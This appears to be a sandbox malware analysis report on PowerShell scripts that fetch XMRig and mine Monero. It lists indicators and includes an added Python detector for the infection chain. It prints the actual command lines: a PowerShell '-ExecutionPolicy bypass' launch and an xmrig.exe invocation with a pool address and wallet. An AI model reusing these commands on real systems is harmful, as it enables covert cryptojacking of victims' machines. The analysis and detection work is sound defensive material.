| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 404 wrote to memory of 2528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 404 wrote to memory of 2528 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/404-3-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp
memory/404-5-0x00000225A3C60000-0x00000225A3C82000-memory.dmp
memory/404-6-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-10-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-9-0x00000225A3E10000-0x00000225A3E86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi4ygcu2.fzs.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/404-26-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-49-0x00000225A3DE0000-0x00000225A3DF2000-memory.dmp
memory/404-62-0x00000225A3DB0000-0x00000225A3DBA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2528-91-0x000001F716CF0000-0x000001F716D10000-memory.dmp
memory/2528-92-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/404-93-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/404-95-0x00007FFE770D3000-0x00007FFE770D4000-memory.dmp
memory/2528-94-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/404-96-0x00007FFE770D0000-0x00007FFE77ABC000-memory.dmp
memory/2528-97-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-98-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-99-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-100-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-101-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-102-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-103-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-104-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-105-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-106-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-107-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-108-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-109-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-110-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-111-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-112-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-113-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-114-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-115-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-116-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-117-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-118-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-119-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-120-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-121-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-122-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-123-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-124-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-125-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-126-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-127-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-128-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-129-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-130-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-131-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-132-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-133-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-134-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-135-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-136-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-137-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-138-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-139-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-140-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-141-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-142-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-143-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-144-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-145-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-146-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-147-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-148-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-149-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-150-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-151-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-152-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-153-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-154-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-155-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-156-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
memory/2528-157-0x00007FF6B6D30000-0x00007FF6B7963000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:24
Platform
win7-20240221-en
Max time kernel
1556s
Max time network
1561s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
Files
memory/1664-4-0x000007FEF5F5E000-0x000007FEF5F5F000-memory.dmp
memory/1664-5-0x000000001B3B0000-0x000000001B692000-memory.dmp
memory/1664-6-0x0000000002310000-0x0000000002318000-memory.dmp
memory/1664-7-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-8-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-9-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-10-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-11-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
memory/1664-12-0x000007FEF5CA0000-0x000007FEF663D000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:41
Platform
win10v2004-20240508-en
Max time kernel
1662s
Max time network
1671s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.227.14:443 | | tcp |
Files
memory/4220-0-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp
memory/4220-1-0x0000018758790000-0x00000187587B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2a55eua.0b5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4220-11-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-12-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-13-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-14-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-15-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-16-0x00007FFB278C3000-0x00007FFB278C5000-memory.dmp
memory/4220-17-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
memory/4220-18-0x00007FFB278C0000-0x00007FFB28381000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:48
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3152 wrote to memory of 4316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3152 wrote to memory of 4316 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
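The process chain above is the whole story of this sample: PowerShell launched with `-ExecutionPolicy bypass -File` on a script in `%LOCALAPPDATA%\Temp`, which fetches an XMRig release from GitHub and runs it with a pool (`-o host:port`) and a Monero wallet (`-u`). The `__PSScriptPolicyTest_*.ps1` entries under Files are PowerShell's own AppLocker/WDAC policy probe, not something the script dropped. The detector below is an added example written for this report, not part of the sandbox output: it takes process-creation events (a hypothetical flattened Sysmon Event ID 1 shape with `pid`, `ppid`, `image`, `command_line`), flags the bypass-from-Temp launch, flags a Temp executable spawned by PowerShell, and pulls the pool host, port and wallet out of an XMRig-style command line so they can be pivoted on across the fleet. The sample events are constructed from the PIDs and command lines of this run plus one benign control.

```python
"""Extract cryptominer IOCs from process-creation events and flag the
PowerShell -> dropped XMRig chain seen in this sandbox report.

Added example for this report, not part of the sandbox output.
Assumes events are dicts with 'pid', 'ppid', 'image', 'command_line'
(a hypothetical flattened Sysmon Event ID 1 record).
"""
import re
from dataclasses import dataclass, field

# Monero standard address: 95 base58 chars (no 0, O, I, l) starting with '4'.
MONERO_ADDR_RE = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
# XMRig pool and user flags: -o/--url and -u/--user, in "--url=x" or "--url x" form.
POOL_RE = re.compile(r"(?:^|\s)(?:-o|--url)[\s=]+(\S+)")
USER_RE = re.compile(r"(?:^|\s)(?:-u|--user)[\s=]+(\S+)")
PS_BYPASS_RE = re.compile(r"-ExecutionPolicy\s+bypass", re.IGNORECASE)
PS_FILE_RE = re.compile(r'-File\s+"?([^"]+\.ps1)"?', re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    pid: int
    details: dict = field(default_factory=dict)


def parse_pool(url: str):
    """Split 'host:port' (optionally prefixed by stratum+tcp://) into (host, port)."""
    host_port = url.split("://", 1)[-1]
    host, sep, port = host_port.rpartition(":")
    if not sep or not port.isdigit():
        return host_port, None
    return host, int(port)


def miner_iocs(command_line: str):
    """Return pool host/port, wallet and whether the wallet looks like a Monero
    address when the command line carries XMRig-style flags, else None."""
    pool = POOL_RE.search(command_line)
    user = USER_RE.search(command_line)
    if not (pool and user):
        return None
    host, port = parse_pool(pool.group(1))
    wallet = user.group(1)
    return {"pool_host": host, "pool_port": port, "wallet": wallet,
            "wallet_is_monero": bool(MONERO_ADDR_RE.match(wallet))}


def analyse(events):
    """Run the three checks over a list of process-creation events."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        cl, image = e["command_line"], e["image"].lower()
        # 1. PowerShell policy bypass running a script out of the user's Temp dir.
        if image.endswith("powershell.exe") and PS_BYPASS_RE.search(cl):
            m = PS_FILE_RE.search(cl)
            script = m.group(1) if m else None
            if script and TEMP_DIR_RE.search(script):
                findings.append(Finding("powershell_bypass_temp_script", e["pid"],
                                        {"script": script}))
        # 2. Any process carrying miner pool + wallet flags.
        iocs = miner_iocs(cl)
        if iocs:
            findings.append(Finding("xmrig_pool_connection", e["pid"], iocs))
        # 3. An executable in Temp whose parent is PowerShell (dropped-EXE pattern).
        parent = by_pid.get(e["ppid"])
        if parent and parent["image"].lower().endswith("powershell.exe") \
                and TEMP_DIR_RE.search(e["image"]):
            findings.append(Finding("temp_exe_spawned_by_powershell", e["pid"],
                                    {"image": e["image"], "ppid": e["ppid"]}))
    return findings


# Constructed events: PIDs and command lines taken from the behavioral16 run,
# parent PID 1000 and the benign third event are made up for the example.
SAMPLE_EVENTS = [
    {"pid": 3152, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"'},
    {"pid": 4316, "ppid": 3152,
     "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "command_line": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'},
    # Benign control: a script run from outside Temp without a policy bypass.
    {"pid": 5000, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -File "C:\Scripts\inventory.ps1"'},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f.rule, f.pid, f.details)
```

Run against the three sample events it yields exactly three findings: the bypass launch on PID 3152, the pool connection on PID 4316 with `gulf.moneroocean.stream` / `10128` and a syntactically valid Monero wallet, and the Temp-executable-from-PowerShell relation for 4316; the control event produces nothing. The wallet and pool are the durable pivots: the dropped `xmrig.exe` is a stock release (its hash will match the upstream GitHub asset), so hunting on the binary alone will also light up legitimate miners.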
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/3152-3-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp
memory/3152-5-0x0000011D3BEB0000-0x0000011D3BED2000-memory.dmp
memory/3152-7-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/3152-9-0x0000011D3C060000-0x0000011D3C0D6000-memory.dmp
memory/3152-10-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xymowxz0.cfe.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3152-26-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/3152-49-0x0000011D3C0E0000-0x0000011D3C0F2000-memory.dmp
memory/3152-62-0x0000011D3C040000-0x0000011D3C04A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4316-91-0x000002A746F30000-0x000002A746F50000-memory.dmp
memory/4316-92-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/4316-93-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp
memory/3152-94-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/3152-95-0x00007FFC012B3000-0x00007FFC012B4000-memory.dmp
memory/3152-96-0x00007FFC012B0000-0x00007FFC01C9C000-memory.dmp
memory/4316-{97..157}-0x00007FF6242B0000-0x00007FF624EE3000-memory.dmp (61 consecutive dumps of the same region of PID 4316, xmrig.exe)
Analysis: behavioral32
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:50
Platform
win11-20240508-en
Max time kernel
1766s
Max time network
1775s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
